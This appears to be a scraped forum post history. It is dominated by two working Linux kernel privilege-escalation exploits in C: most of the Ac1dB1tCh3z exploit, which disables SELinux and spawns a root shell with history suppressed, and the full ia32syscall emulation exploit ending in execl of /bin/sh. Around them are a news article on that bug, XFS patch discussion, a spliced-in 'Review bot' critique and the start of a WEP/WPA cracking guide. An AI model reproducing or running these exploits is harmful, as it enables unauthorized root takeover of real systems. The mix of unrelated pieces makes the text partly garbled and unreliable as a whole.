static int wtfyourunhere_heee(char *out_release, char* out_version)
{
    int ret;
    const char*ptr;
    int count=0;
    char r[32], *bptr;
    struct utsname buf;
    ret = uname(&buf);
    if(ret < 0)
        return -1;
    strcpy(out_release, buf.release);
    strcpy(out_version, buf.version);
    ptr = buf.release;
    bptr = r;
    memset(r, 0x00, sizeof(r));
    while(*ptr) {
        if(count == 2) {
            if(*ptr >= '0' && *ptr <= '9')
                *bptr++ = *ptr;
            else
                break;
        }
        if(*ptr == '.')
            count++;
        ptr++;
    }
    if(strlen(r) < 1 || !atoi(r))
        return -1;
    return atoi(r);
}

static void p4tch_sel1nux_codztegfaddczda(struct LSM_rhel *table)
{
    *((__yyrhdgdtfs66ytgetrfd *)(dis4blens4sel1nuxhayettgdr64545 + CJE_4554TFFDTRMAJHD_OFF)) = table->selinux_enforcing;
    *((__yyrhdgdtfs66ytgetrfd *)(dis4blens4sel1nuxhayettgdr64545 + RJMPDDTGR_AYYYDGTREFCCV7761_OF)) = table->audit_enabled;
    __dhdyetgdfstreg__(ttrfd0 + RJMPDDTGR_GDTDGTSFRDFT, dis4blens4sel1nuxhayettgdr64545, sizeof(dis4blens4sel1nuxhayettgdr64545)-1);
    __dhdyetgdfstreg__(ruujhdbgatrfe345 + RJMPDDTGR_DHDYSGTSFDRTAC_SE, dis4blens4sel1nuxhayettgdr64545, sizeof(dis4blens4sel1nuxhayettgdr64545)-1);
}

static __yyrhdgdtfs66ytgetrfd get_sym_ex(const char* s, const char* filename, int ignore_flag)
{
    FILE *ka;
    char line[512];
    char reloc_a[64];
    char reloc[64];
    if(!(flags & KERN_HHSYPPLORQTWGFD) && !ignore_flag)
        return 0;
    ka = fopen(filename, "r");
    if(!ka)
        return 0;
    while(fgets(line, 512, ka) != NULL) {
        char *l_p = line;
        char *ra_p = reloc_a;
        char *r_p = reloc;
        memset(reloc, 0x00, sizeof(reloc));
        memset(reloc_a, 0x00, sizeof(reloc_a));
        while(*l_p != ' ' && (ra_p - reloc_a) < 64)
            *ra_p++ = *l_p++;
        l_p += 3;
        while(*l_p != ' ' && *l_p != '\n' && *l_p != '\t' && (r_p - reloc) < 64)
            *r_p++ = *l_p++;
        if(!strcmp(reloc, s)) {
            __gggdfstsgdt_dddex("$$$ %s->%s\n", s, reloc_a);
            return strtoull(reloc_a, NULL, 16);
        }
    }
    return 0;
}

static inline __yyrhdgdtfs66ytgetrfd get_sym(const char* s)
{
    return get_sym_ex(s, KALLSYMS, 0);
}

static int parse_cred(const char* val)
{
    int i=0;
    const char* p = val;
    char local[64], *l;
    for(i=0; i<3; i++) {
        memset(local, 0x00, sizeof(local));
        l = local;
        while(*p && *p != ',')
            *l++ = *p++;
        if(!(*p) && i != 2)
            return -1;
        _m_cred[i] = strtoull(local, NULL, 16);
        p++;
    }
    return 0;
}

#define SELINUX_OPS "selinux_ops"
#define DUMMY_SECURITY_OPS "dummy_security_ops"
#define CAPABILITY_OPS "capability_ops"
#define SELINUX_ENFORCING "selinux_enforcing"
#define AUDIT_ENABLED "audit_enabled"

struct LSM_rhel *lsm_rhel_find_target(int check_rhel)
{
    int i;
    char mapbuf[128];
    struct LSM_rhel *lsm = &(known_targets[0]);
    if(check_rhel && !isRHHGDPPLADSF(krelease)) {
        __pppp_tegddewyfg("!!! N0t a RH3l k3rn3l \n");
        return NULL;
    }
    __pppp_tegddewyfg("$$$ L00k1ng f0r kn0wn t4rg3tz.. \n");
    for(i=0; i<sizeof(known_targets)/sizeof(struct LSM_rhel); i++, lsm++) {
        if(!strcmp(krelease, lsm->krelease) && !strcmp(kversion, lsm->kversion)) {
            __gggdfstsgdt_dddex("$$$ Th1z b1tch 1z t0azt. kn0wn t4rg3t: %s %s \n", lsm->krelease, lsm->kversion);
            return lsm;
        }
    }
    __pppp_tegddewyfg("$$$ c0mput3r 1z aqu1r1ng n3w t4rg3t...\n");
    strcpy(mapbuf, "/boot/System.map-");
    strcat(mapbuf, krelease);
    dyn4nt4n1labeggeyrthryt.selinux_ops = get_sym_ex(SELINUX_OPS, mapbuf, 1);
    dyn4nt4n1labeggeyrthryt.dummy_security_ops = get_sym_ex(DUMMY_SECURITY_OPS, mapbuf, 1);
    dyn4nt4n1labeggeyrthryt.capability_ops = get_sym_ex(CAPABILITY_OPS, mapbuf, 1);
    dyn4nt4n1labeggeyrthryt.selinux_enforcing = get_sym_ex(SELINUX_ENFORCING, mapbuf, 1);
    dyn4nt4n1labeggeyrthryt.audit_enabled = get_sym_ex(AUDIT_ENABLED, mapbuf, 1);
    if(!dyn4nt4n1labeggeyrthryt.selinux_ops || !dyn4nt4n1labeggeyrthryt.dummy_security_ops ||
       !dyn4nt4n1labeggeyrthryt.capability_ops || !dyn4nt4n1labeggeyrthryt.selinux_enforcing ||
       !dyn4nt4n1labeggeyrthryt.audit_enabled)
        return NULL;
    return &dyn4nt4n1labeggeyrthryt;
}

static void put_your_hands_up_hooker(int argc, char *argv[])
{
    int fd,ver,ret;
    char __b[16];
    fd = open(KALLSYMS, O_RDONLY);
    ret = read(fd, __b, 16); // dummy read
    if((fd >= 0 && ret > 0)) {
        __pppp_tegddewyfg("$$$ Kallsyms +r\t\n"); // d0nt p4tch m3 br0
        flags |= KERN_HHSYPPLORQTWGFD;
    }
    close(fd);
    ver = wtfyourunhere_heee(krelease, kversion);
    if(ver < 0)
        __yyy_tegdtfsrer("!!! Un4bl3 t0 g3t r3l3as3 wh4t th3 fuq!\n");
    __gggdfstsgdt_dddex("$$$ K3rn3l r3l3as3: %s\n", krelease);
    if(argc != 1) {
        while( (ret = getopt(argc, argv, "siflc:k:o:")) > 0) {
            switch(ret) {
            case 'i':
                flags |= KERN_DIS_GGDHHDYQEEWR4432PPOI_LSM|KERN_DIS_DGDGHHYTTFSR34353_FOPS;
                useidt=1; // u have to use -i to force IDT Vector
                break;
            case 'f':
                flags |= KERN_DIS_GGDHHDYQEEWR4432PPOI_LSM|KERN_DIS_GGDYYTDFFACVFD_IDT;
                break;
            case 'l':
                flags |= KERN_DIS_GGDYYTDFFACVFD_IDT|KERN_DIS_DGDGHHYTTFSR34353_FOPS;
                break;
            case 'c':
                if(!optarg || parse_cred(optarg) < 0)
                    __yyy_tegdtfsrer("!!! Un4bl3 t0 p4s3 cr3d c0d3z\n");
                break;
            case 'k':
                if(optarg)
                    _m_fops = strtoull(optarg, NULL, 16);
                else
                    __yyy_tegdtfsrer("!!! Un4bl3 t0 p4rs3 f0P numb3rs\n");
                break;
            case 's':
                if(!isSelinuxEnabled())
                    __pppp_tegddewyfg("??? wh4t th3 fuq s3l1nux 1z n0t 3v3n 3n4bl3d!?\n");
                else
                    flags |= KERN_DIS_GGSTEYGDTREFRET_SEL1NUX;
                break;
            case 'o':
                if(optarg)
                    _m_cpu_off = strtoull(optarg, NULL, 16);
                else
                    __yyy_tegdtfsrer("!!! Un4bl3 t0 p4rs3 f0p c0mput3r numb3rs\n");
                break;
            }
        }
    }
    if(ver >= 29) // needs cred structure
    {
        flags |= KERN_DGGDYDTEGGETFDRLAK;
        if(!_m_cred[0] || !_m_cred[1] || !_m_cred[2]) {
            _m_cred[0] = get_sym(PREPARE_GGDTSGFSRFSD);
            _m_cred[1] = get_sym(OVERRIDE_GGDTSGFSRFSD);
            _m_cred[2] = get_sym(REVERT_DHDGTRRTEFDTD);
        }
        if(!_m_cred[0] || !_m_cred[1] || !_m_cred[2]) {
            __yyy_tegdtfsrer("!!! Err0r 1n s3tt1ng cr3d sh3llc0d3z\n");
        }
        __pppp_tegddewyfg("$$$ Kernel Credentials detected\n");
        *((__yyrhdgdtfs66ytgetrfd *)(r1ngrrrrrrr + R0YTTTTUHLFSTT_OFF1)) = _m_cred[0];
        *((__yyrhdgdtfs66ytgetrfd *)(r1ngrrrrrrr + R0YGGSFDARTDF_DHDYTEGRDFD_D)) = _m_cred[1];
        *((__yyrhdgdtfs66ytgetrfd *)(r1ngrrrrrrr + R0TDGFSRSLLSJ_SHSYSTGD)) = _m_cred[2];
    }
    if(ver >= 30) // needs cpu offset
    {
        flags |= KERN_DHHDYTMLADSFPYT;
        if(!_m_cpu_off)
            _m_cpu_off = (__dgdhdytrg55)get_sym(PER_C_DHHDYDGTREM7765);
        if(!_m_cpu_off)
            __yyy_tegdtfsrer("!!! Err0r 1n s3tt1ng cr3d sh3llc0d3z\n");
        __pppp_tegddewyfg("$$$ K3rn3l per_cpu r3l0cs 3n4bl3d!\t\n");
        *((__dgdhdytrg55 *)(ttrfd0 + RJMPDDTGR_DHDYTGSCAVSF)) = _m_cpu_off;
        *((__dgdhdytrg55 *)(ruujhdbgatrfe345 + RJMPDDTGR_DYHHTSFDARE)) = _m_cpu_off;
    }
}

static void env_prepare(int argc, char* argv[])
{
    put_your_hands_up_hooker(argc, argv);
    if(!(flags & KERN_DIS_DGDGHHYTTFSR34353_FOPS)) // try fops
    {
        __pppp_tegddewyfg("??? Trying the F0PPPPPPPPPPPPPPPPpppppppppp_____ m3th34d\n");
        if(!_m_fops)
            _m_fops = get_sym(RW_FOPS);
        /* TODO: do RW check for newer -mm kernels which has timer_list_struct RO
         * Thanks to the guy who killed this vector... you know who you are:)
         * Lucky for you, there are more:)
         */
        if(_m_fops) {
            usefops=1;
            __pppp_tegddewyfg("$$$ w34p0n 0f ch01c3: F0PZzZzzz\n");
        }
    }
    if(!usefops && !(flags & KERN_DIS_GGDHHDYQEEWR4432PPOI_LSM)) // try lsm(rhel)
    {
        curr_target = lsm_rhel_find_target(1);
        if(!curr_target) {
            __pppp_tegddewyfg("!!! u4bl3 t0 f1nd t4rg3t!? W3'll s33 ab0ut th4t!\n");
        }
        else
            uselsm=1;
    }
    if(useidt && (flags & KERN_DIS_GGSTEYGDTREFRET_SEL1NUX)) { // -i flag
        curr_target = lsm_rhel_find_target(0);
        if(!curr_target) {
            __pppp_tegddewyfg("!!! Un4lb3 t0 f1nd t4rg3t: c0ntinu3 w1th0ut s3linsux d1s4bl3.\n");
            /* remove Selinux Flag */
            flags &= ~KERN_DIS_GGSTEYGDTREFRET_SEL1NUX;
        }
    }
    if(!usefops && !useidt && !uselsm)
        __yyy_tegdtfsrer("!!! 3v3ryth3ng f41l3d!!*@&^@&*^ () * try an0th3r 0d4y L0l\n");
}

static inline int get_socklen(__yyrhdgdtfs66ytgetrfd addr, __dgdhdytrg55 stack)
{
    int socklen_l = 8 + stack - addr - 16;
    return socklen_l;
}

static struct socketcallAT at;
static __dgdhdytrg55 idtover[4] = {0x00100000UL, 0x0020ee00UL, 0x00000000UL, 0x00000000UL};

static void fillsocketcallAT()
{
    at.s = s;
    at.level = SOL_IP;
    at.optname = MCAST_MSFILTER;
    at.optval = buffer;
    at.optlen = &magiclen;
}

static void bitch_call(struct socketcallAT *at, void *stack)
{
    asm volatile(
        "push %%ebx\t\n"
        "push %%esi\t\n"
        "push %%ecx\t\n"
        "push %%edx\t\n"
        "movl $0x66, %%eax\t\n"
        "movl $0xf, %%ebx\t\n"
        "movl %%esp, %%esi\t\n"
        "movl %0, %%ecx\t\n"
        "movl %1, %%esp\t\n"
        "int $0x80\t\n"
        "movl %%esi, %%esp\t\n"
        "pop %%edx\t\n"
        "pop %%ecx\t\n"
        "pop %%esi\t\n"
        "pop %%ebx\t\n"
        : : "r"(at), "r"(stack) : "memory", "eax", "ecx", "ebx", "esi"
    );
}

static void __setmcbuffer(__dgdhdytrg55 value)
{
    int i;
    __dgdhdytrg55 *p = (__dgdhdytrg55*)buffer;
    for(i=0; i<sizeof(buffer)/sizeof(void*); i++)
        *(p+i) = value;
}

static void idt_smash(__yyrhdgdtfs66ytgetrfd idtbase)
{
    int i;
    __dgdhdytrg55 curr;
    for(i=0; i<sizeof(idtover)/sizeof(idtover[0]);i++) {
        curr = idtover[i];
        __setmcbuffer(curr);
        magiclen = get_socklen(idtbase + (i*4), Y0Y0STOP);
        bitch_call(&at, (void*)Y0Y0STOP);
    }
}

static void y0y0stack()
{
    void* map = mmap((void*)Y0Y0SMAP, PAGE_SIZE, PROT_READ|PROT_WRITE, MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED, -1,0);
    if(MAP_FAILED == map)
        __xxxfdgftr_hshsgdt("mmap");
}

static void y0y0code()
{
    void* map = mmap((void*)Y0Y0CMAP, PAGE_SIZE,
#ifdef TRY_REMAP_DEFAULT
        PROT_READ|PROT_WRITE,
#else
        PROT_READ|PROT_WRITE|PROT_EXEC,
#endif
        MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED, -1,0);
    if(MAP_FAILED == map)
        __xxxfdgftr_hshsgdt("mmap");
}

static int rey0y0code(unsigned long old)
{
    int fd;
    void *map;
    volatile char wizard;
    char cwd[1024];
    getcwd(cwd, sizeof(cwd));
    strcat(cwd, "/__tmpfile");
    unlink(cwd);
    fd = open(cwd, O_RDWR|O_CREAT, S_IRWXU);
    if(fd < 0)
        return -1;
    write(fd, (const void*)old, PAGE_SIZE);
    if(munmap((void*)old, PAGE_SIZE) < 0)
        return -1;
    map = mmap((void*)old, PAGE_SIZE, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, fd,0);
    if(map == MAP_FAILED)
        return -1;
    /* avoid lazy page fault handler
     * Triple Fault when using idt vector
     * and no pages are already mapped:)
     */
    wizard = *((char*)old);
    unlink(cwd);
    return wizard;
}

int main(int argc, char*argv[])
{
    int uid,fd;
    __yyrhdgdtfs66ytgetrfd *patch, idtb;
    struct pollfd pfd;
    printf(BANNER);
    uid = getuid();
    env_prepare(argc, argv);
    y0y0stack();
    y0y0code();
    if(useidt) {
        idtb = getidt();
        __gggdfstsgdt_dddex("$$$ h0m3 b4s3 addr3ss: %llx\n", idtb);
        __pppp_tegddewyfg("$$$ Bu1ld1ng r1ngzer0c00l sh3llc0d3 - IDT m3th34d\n");
        patch = (__yyrhdgdtfs66ytgetrfd*)(ruujhdbgatrfe345 + RJMPDDTGR_OFF_IDT);
        *patch = (__yyrhdgdtfs66ytgetrfd)(J0J0R00T);
        __pppp_tegddewyfg("$$$ Prepare: m0rn1ng w0rk0ut b1tch3z\n");
        if(flags & KERN_DIS_GGSTEYGDTREFRET_SEL1NUX) {
            __pppp_tegddewyfg("$$$ add1ng sp3c14l c0de t0 rem0v3 s3linux t3rr0r1zt thr34t\n");
            p4tch_sel1nux_codztegfaddczda(curr_target);
        }
        __dhdyetgdfstreg__((void*)J0J0S, ruujhdbgatrfe345, sizeof(ruujhdbgatrfe345));
    }
    else if(usefops || uselsm) {
        __pppp_tegddewyfg("$$$ Bu1ld1ng r1ngzer0c00l sh3llc0d3 - F0PZzzZzZZ/LSD(M) m3th34d\n");
        patch = (__yyrhdgdtfs66ytgetrfd*)(ttrfd0 + RJMPDDTGR_OFF);
        *patch = (__yyrhdgdtfs66ytgetrfd)(J0J0R00T);
        __setmcbuffer(J0J0S);
        __pppp_tegddewyfg("$$$ Prepare: m0rn1ng w0rk0ut b1tch3z\n");
        if(uselsm && (flags & KERN_DIS_GGSTEYGDTREFRET_SEL1NUX)) {
            __pppp_tegddewyfg("$$$ add1ng sp3c14l c0de t0 rem0v3 s3linux t3rr0r1zt thr34t\n");
            p4tch_sel1nux_codztegfaddczda(curr_target);
        }
        __dhdyetgdfstreg__((void*)J0J0S, ttrfd0, sizeof(ttrfd0));
    }
    /* set shellcode level 2 */
    if(flags & KERN_DGGDYDTEGGETFDRLAK) {
        __pppp_tegddewyfg("$$$ Us1ng cr3d s3ash3llc0d3z\n");
        __dhdyetgdfstreg__((void*)J0J0R00T, r1ngrrrrrrr, sizeof(r1ngrrrrrrr));
    }
    else {
        __pppp_tegddewyfg("$$$ Us1ng st4nd4rd s3ash3llz\n");
        __dhdyetgdfstreg__((void*)J0J0R00T, ttrg0ccc, sizeof(ttrg0ccc));
        *((unsigned int*)(J0J0R00T + R0C_0FF)) = uid;
    }
    __pppp_tegddewyfg("$$$ 0p3n1ng th3 m4giq p0rt4l\n");
    s = socket(AF_INET, SOCK_DGRAM, 0);
    if(s < 0)
        __xxxfdgftr_hshsgdt("socket");
    fillsocketcallAT();
#ifdef TRY_REMAP_DEFAULT
    if(rey0y0code(Y0Y0CMAP) < 0)
        __yyy_tegdtfsrer("!!! Un4bl3 t0 r3m4p sh1t\t\n");
#endif
    if(useidt) {
        __yyrhdgdtfs66ytgetrfd idtentry = idtb + (2*sizeof(__yyrhdgdtfs66ytgetrfd)*0xdd);
        __gggdfstsgdt_dddex("$$$ Us1ng 1dt 3ntry: %d\n", 0xdd);
        idt_smash((idtentry));
        sleep(1);
        asm volatile("int $0xdd\t\n");
    }
    else if(usefops) {
        magiclen = get_socklen(_m_fops, Y0Y0STOP);
        magiclen -= 7*sizeof(__yyrhdgdtfs66ytgetrfd);
        __gggdfstsgdt_dddex("$$$ m4q1c p0rt4l l3n f0und: 0x%x\n", magiclen);
        __pppp_tegddewyfg("$$$ 0v3r thr0w f0ps g0v3rnm3nt\n");
        bitch_call(&at, (void*)Y0Y0STOP);
        sleep(1);
        fd = open(TMAGIC_66TDFDRTS, O_RDONLY);
        if(fd < 0)
            __xxxfdgftr_hshsgdt("!!! fuq t1m3r_l1st");
        pfd.fd = fd;
        pfd.events = POLLIN | POLLOUT;
        poll(&pfd, 1, 0);
    }
    else if(uselsm) {
        int msqid;
        __yyrhdgdtfs66ytgetrfd selinux_msg_off = curr_target->selinux_ops + (8*RHEL_LSM_OFF);
        __yyrhdgdtfs66ytgetrfd dummy_msg_off = curr_target->dummy_security_ops + (8*RHEL_LSM_OFF);
        __yyrhdgdtfs66ytgetrfd capability_msg_off = curr_target->capability_ops + (8*RHEL_LSM_OFF);
        msqid = msgget(0, IPC_PRIVATE|0600);
        if(msqid < 0)
            __xxxfdgftr_hshsgdt("!!! fuqqqqqq msgg3t");
        magiclen = get_socklen(selinux_msg_off, Y0Y0STOP);
        __setmcbuffer(J0J0S);
        bitch_call(&at, (void*)Y0Y0STOP);
        magiclen = get_socklen(selinux_msg_off+4, Y0Y0STOP);
        __setmcbuffer(0);
        bitch_call(&at, (void*)Y0Y0STOP);
        magiclen = get_socklen(dummy_msg_off, Y0Y0STOP);
        __setmcbuffer(J0J0S);
        bitch_call(&at, (void*)Y0Y0STOP);
        magiclen = get_socklen(dummy_msg_off+4, Y0Y0STOP);
        __setmcbuffer(0);
        bitch_call(&at, (void*)Y0Y0STOP);
        magiclen = get_socklen(capability_msg_off, Y0Y0STOP);
        __setmcbuffer(J0J0S);
        bitch_call(&at, (void*)Y0Y0STOP);
        magiclen = get_socklen(capability_msg_off+4, Y0Y0STOP);
        __setmcbuffer(0);
        bitch_call(&at, (void*)Y0Y0STOP);
        msgctl(msqid, IPC_RMID, (struct msqid_ds *) NULL); // exploit it
    }
    munmap((void*)Y0Y0CMAP, PAGE_SIZE);
    /* exec */
    if(getuid() == 0) {
        pid_t pid;
        __pppp_tegddewyfg("$$$ bl1ng bl1ng n1gg4 :PppPpPPpPPPpP\n");
        pid = fork();
        if(pid == 0) {
            char *args[] = {"/bin/sh", "-i", NULL};
            char *envp[] = {"TERM=linux", "BASH_HISTORY=/dev/null", "HISTORY=/dev/null", "history=/dev/null",
                            "HISTFILE=/dev/null", "HISTFILESIZE=0",
                            "PATH=/bin:/sbin:/usr/sbin:/usr/bin:/usr/local/bin:/usr/local/sbin", NULL };
            execve("/bin/sh", args, envp);
        }
        else {
            int status;
            waitpid(pid, &status, 0);
        }
    }
    else
        __pppp_tegddewyfg("!!! y0u fuq1ng f41l. 
g3t th3 fuq 0ut!\n"); close(s); return 0; } #endif // -m32 Rezultat pe 2.6.34.4-0.1-default (lipsa de ocupatie): nytro@rst[/home/nytro/Documents]: ./test Ac1dB1tCh3z VS Linux kernel 2.6 kernel 0d4y $$$ Kallsyms +r $$$ K3rn3l r3l3as3: 2.6.34.4-0.1-default $$$ prepare_creds->c02647b0 $$$ override_creds->c02645b0 $$$ revert_creds->c0264750 $$$ Kernel Credentials detected [COLOR="Red"]!!! Err0r 1n s3tt1ng cr3d sh3llc0d3z[/COLOR] nytro@rst[/home/nytro/Documents]:
  11. x86_64 Linux Kernel ia32syscall Emulation Privilege Escalation

Something about it: http://rstcenter.com/forum/25902-die-hard-bug-bytes-linux-kernel-second-time.rst

/*
 * exploit for x86_64 linux kernel ia32syscall emulation (again)
 * rediscovered by ben hawkes
 * with help from robert swiecki and tavis ormandy
 *
 * original vulnerability discovered by Wojciech Purczynski
 *
 * original exploit by
 * Robert Swiecki <robert_at_swiecki.net>
 * Przemyslaw Frasunek <venglin_at_freebsd.lublin.pl>
 * Pawel Pisarczyk <pawel_at_immos.com.pl>
 *
 * kernel priv escalation code borrowed from spender
 *
 */

#include <sys/types.h>
#include <sys/wait.h>
#include <sys/ptrace.h>
#include <inttypes.h>
#include <sys/reg.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <string.h>

typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;

int kernelmodecode(void *file, void *vma)
{
    commit_creds(prepare_kernel_cred(0));
    return -1;
}

unsigned long get_symbol(char *name)
{
    FILE *f;
    unsigned long addr;
    char dummy;
    char sname[512];
    int ret = 0, oldstyle = 0;

    f = fopen("/proc/kallsyms", "r");
    if (f == NULL) {
        f = fopen("/proc/ksyms", "r");
        if (f == NULL)
            return 0;
        oldstyle = 1;
    }

    while (ret != EOF) {
        if (!oldstyle) {
            ret = fscanf(f, "%p %c %s\n", (void **) &addr, &dummy, sname);
        } else {
            ret = fscanf(f, "%p %s\n", (void **) &addr, sname);
            if (ret == 2) {
                char *p;
                if (strstr(sname, "_O/") || strstr(sname, "_S.")) {
                    continue;
                }
                p = strrchr(sname, '_');
                if (p > ((char *) sname + 5) && !strncmp(p - 3, "smp", 3)) {
                    p = p - 4;
                    while (p > (char *)sname && *(p - 1) == '_') {
                        p--;
                    }
                    *p = '\0';
                }
            }
        }
        if (ret == 0) {
            fscanf(f, "%s\n", sname);
            continue;
        }
        if (!strcmp(name, sname)) {
            printf("resolved symbol %s to %p\n", name, (void *) addr);
            fclose(f);
            return addr;
        }
    }
    fclose(f);
    return 0;
}

static void docall(uint64_t *ptr, uint64_t size)
{
    commit_creds = (_commit_creds) get_symbol("commit_creds");
    if (!commit_creds) {
        printf("symbol table not available, aborting!\n");
        exit(1);
    }
    prepare_kernel_cred = (_prepare_kernel_cred) get_symbol("prepare_kernel_cred");
    if (!prepare_kernel_cred) {
        printf("symbol table not available, aborting!\n");
        exit(1);
    }

    uint64_t tmp = ((uint64_t)ptr & ~0x00000000000FFF);
    printf("mapping at %lx\n", tmp);
    if (mmap((void*)tmp, size, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) == MAP_FAILED) {
        printf("mmap fault\n");
        exit(1);
    }
    for (; (uint64_t) ptr < (tmp + size); ptr++)
        *ptr = (uint64_t)kernelmodecode;

    __asm__("\n"
    "\tmovq $0x101, %rax\n"
    "\tint $0x80\n");

    printf("UID %d, EUID:%d GID:%d, EGID:%d\n", getuid(), geteuid(), getgid(), getegid());
    execl("/bin/sh", "bin/sh", NULL);
    printf("no /bin/sh ??\n");
    exit(0);
}

int main(int argc, char **argv)
{
    int pid, status, set = 0;
    uint64_t rax;
    uint64_t kern_s = 0xffffffff80000000;
    uint64_t kern_e = 0xffffffff84000000;
    uint64_t off = 0x0000000800000101 * 8;

    if (argc == 4) {
        docall((uint64_t*)(kern_s + off), kern_e - kern_s);
        exit(0);
    }

    if ((pid = fork()) == 0) {
        ptrace(PTRACE_TRACEME, 0, 0, 0);
        execl(argv[0], argv[0], "2", "3", "4", NULL);
        perror("exec fault");
        exit(1);
    }

    if (pid == -1) {
        printf("fork fault\n");
        exit(1);
    }

    /* the forum's smiley conversion ate the ";;)" of both infinite loops below;
     * restored so the tracer loop and the final sleep loop compile */
    for (;;) {
        if (wait(&status) != pid)
            continue;
        if (WIFEXITED(status)) {
            printf("Process finished\n");
            break;
        }
        if (!WIFSTOPPED(status))
            continue;
        if (WSTOPSIG(status) != SIGTRAP) {
            printf("Process received signal: %d\n", WSTOPSIG(status));
            break;
        }
        rax = ptrace(PTRACE_PEEKUSER, pid, 8*ORIG_RAX, 0);
        if (rax == 0x000000000101) {
            if (ptrace(PTRACE_POKEUSER, pid, 8*ORIG_RAX, off/8) == -1) {
                printf("PTRACE_POKEUSER fault\n");
                exit(1);
            }
            set = 1;
            //rax = ptrace(PTRACE_PEEKUSER, pid, 8*ORIG_RAX, 0);
        }
        if ((rax == 11) && set) {
            ptrace(PTRACE_DETACH, pid, 0, 0);
            for (;;)
                sleep(10000);
        }
        if (ptrace(PTRACE_SYSCALL, pid, 1, 0) == -1) {
            printf("PTRACE_SYSCALL fault\n");
            exit(1);
        }
    }
    return 0;
}
  12. If you can help, why don't you post here so you help more people?
  13. Yes, the Ubuntu people probably fix such (trivial) problems and keep them only for themselves. Which means they are jerks. They contribute almost nothing to the kernel; they're a kind of leechers. Anyway, before compiling, I selected almost all the options, to check where errors or warnings appear. And with the latest version I got a fatal error, but I didn't have time to look into what it was about, school started. I'll come back with a few more bugfixes like these, then who knows, maybe I'll learn a bit more and move on. Edit: The patch for those warnings (xfs_alloc.c) has appeared: http://www.kernel.org/diff/diffview.cgi?file=%2Fpub%2Flinux%2Fkernel%2Fv2.6%2Fnext%2Fpatch-v2.6.36-rc4-next-20100917.bz2;z=3819
  14. Get your root access here

By Dan Goodin in San Francisco
15th September 2010 18:21 GMT

The Linux kernel has been purged of a bug that gave root access to untrusted users – again.

The vulnerability in a component of the operating system that translates values from 64 bits to 32 bits (and vice versa) was fixed once before – in 2007 with the release of version 2.6.22.7. But several months later, developers inadvertently rolled back the change, once again leaving the OS open to attacks that allow unprivileged users to gain full root access.

The bug was originally discovered by the late hacker Wojciech "cliph" Purczynski. But Ben Hawkes, the researcher who discovered the kernel regression bug, said here that he grew suspicious when he recently began tinkering under the hood of the open-source OS and saw signs the flaw was still active.

“I showed this to my friend Robert Swiecki who had written an exploit for the original bug in 2007, and he immediately said something along the lines of 'well this is interesting,'” Hawkes wrote. “We pulled up his old exploit from 2007, and with a few minor modifications to the privilege escalation code, we had a root shell.”

No doubt, Linux fans will be quick to point out that the bug can be exploited only by those with a valid account on a targeted machine in the first place. This is true, but the existence of vulnerabilities like these is a big deal in corporate, government and educational environments, where Linux is a mainstay and has a large following. Add privilege escalation to the mix and things like protected mode, integrity levels, and chroot – often the very reason the OS was chosen in the first place – are largely wiped out. The oversight means that untrusted users with, say, limited SSH access have a trivial means to gain unfettered access to pretty much any 64-bit installation.

Consider, too, that the bug has been allowed to fester in the kernel for years and was already fixed once before, and we think a measured WTF is in order. It was one of two privilege-elevation vulnerabilities Hawkes disclosed on Wednesday in the Linux 32-bit compatibility mode. The official updates are here, here and here. ®
  15. This patch will probably show up too, in who knows which upcoming kernel version:

--- a/fs/xfs/xfs_dir2_data.h 2010-09-02 11:13:11.632007536 +0300
+++ b/fs/xfs/xfs_dir2_data.h 2010-09-02 11:13:28.080006488 +0300
@@ -87,7 +87,7 @@ typedef struct xfs_dir2_data_entry {
 __be64 inumber; /* inode number */
 __u8 namelen; /* name length */
- __u8 name[1]; /* name bytes, no null */
+ __u8 name[2]; /* name bytes, no null */
 /* variable offset */
 __be16 tag; /* starting offset of us */
 } xfs_dir2_data_entry_t;

It's about an array with a single element, but two elements get used, and an ugly error appears. name[1] is used when only name[0] exists. And now I'm discussing another patch with Alex Elder, the maintainer, but I didn't submit that one the right way.

Edit: The other bug will be fixed too; the generated warning is kind of silly:

fs/xfs/xfs_alloc.c: In function ‘xfs_alloc_ag_vextent_near’:
fs/xfs/xfs_alloc.c:694:15: warning: ‘ltlena’ may be used uninitialized in this function
fs/xfs/xfs_alloc.c:683:15: warning: ‘gtlena’ may be used uninitialized in this function

Those variables are initialized inside some conditional expressions, which is why that warning appears, but in practice there is no problem. Still, it's ugly for such errors to show up when compiling the kernel. The fix is trivial: initializing those variables to 0.
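Review bot: bumping `__u8 name[1];` to `__u8 name[2];` treats the warning about indexing past a one-element array as a bounds problem, but the `/* variable offset */` comment on `tag` shows that `name` is the trailing variable-length-member idiom: the name is `namelen` bytes long, so a three-byte name still indexes past the declared bound and the same complaint can return, while the change also alters sizeof(xfs_dir2_data_entry_t), which matters for a structure whose `__be64`/`__be16` fields mark it as a byte-exact, endian-fixed layout. The conventional fix is a flexible array member (`__u8 name[];`), which makes `name[1]` legitimate by construction, after confirming that no size or offset arithmetic relies on sizeof() including that one byte; the patch description should also name the compiler warning or error that prompted the change, since the post only says "an ugly error appears".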
  16. If you know C++, the best solution is to take a look at libpurple.
  17. See, there are also people who don't ask for money for everything. Moved to Stuff tools; here it would "disappear" quickly.
  18. For about 5 months now I too have been using almost only Linux (I used Windows while I wrote the article about the Winsock API). And I like the freedom it offers. Well, I still stop services without checking what they're for and break a thing or two, but I've learned how things work. Anyway, I don't like Gnome at all; KDE rules.
  19. How To Crack WEP and WPA Wireless Networks

Author: No idea

With the popularity of wireless networks and mobile computing, an overall understanding of common security issues has become not only relevant, but very necessary for both home/SOHO users and IT professionals alike. This article is aimed at illustrating current security flaws in WEP/WPA/WPA2.

Successfully cracking a wireless network assumes some basic familiarity with networking principles and terminology, as well as working with command-line tools. A basic familiarity with Linux can be helpful as well.

Disclaimer: Attempting to access a network other than your own, or one you have permission to use, is illegal in some U.S. jurisdictions. Speed Guide, Inc. are not to be held liable for any damages resulting from the use or misuse of the information in this article.

